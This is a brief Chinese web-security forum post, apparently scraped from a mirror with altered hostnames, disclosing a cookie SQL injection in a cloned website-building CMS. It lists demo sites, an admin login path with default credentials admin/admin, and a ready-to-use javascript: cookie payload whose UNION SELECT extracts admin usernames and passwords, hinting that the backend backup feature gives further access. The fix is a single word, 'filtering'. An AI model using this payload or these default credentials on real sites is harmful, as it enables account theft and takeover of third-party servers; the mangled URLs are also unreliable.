by Mr.DzY from HdhCmsTest0855.tv
由于真搞不明白是哪个是原作者,只好用个[某]字来代替。 你抄抄,我抄抄,大家一起抄。大家一起来做网站建设。 下面分别是两个建站公司的源码,一模一样的。泥玛的,坑爹啊。。 真是万分蛋疼。。有兴趣的朋友可以下载来看看。除了版权不同,神马都一样。
源码下载1: http://HdhCmsTest2cto测试数据/ym/201109/29495.html 源码下载2: HdhCmsTest2cto测试数据/ym/201108/28932.html
演示1: HdhCmsTestshengmake.net/ceshi/huichengv10/ 演示2: HdhCmsTesttb11.net/system/xitong/
管理地址:http://HdhCmsTest2cto测试数据 /admin/login. asp 后台帐号:admin 后台密码:admin
exp: javascript:alert(document.cookie="id="+escape("170 and 1=2 union select 1,username,3,4,5,6,password,8,9,10,11,12,13 from admin"));
出错自己猜下长度。
后台有备份,也不多说了。
修复:过滤(TNND,除了这二字也想不出别的什么来说了....)。
查看更多关于某系统cookies批量注入漏洞及修复 - 网站安全 - 自的详细内容...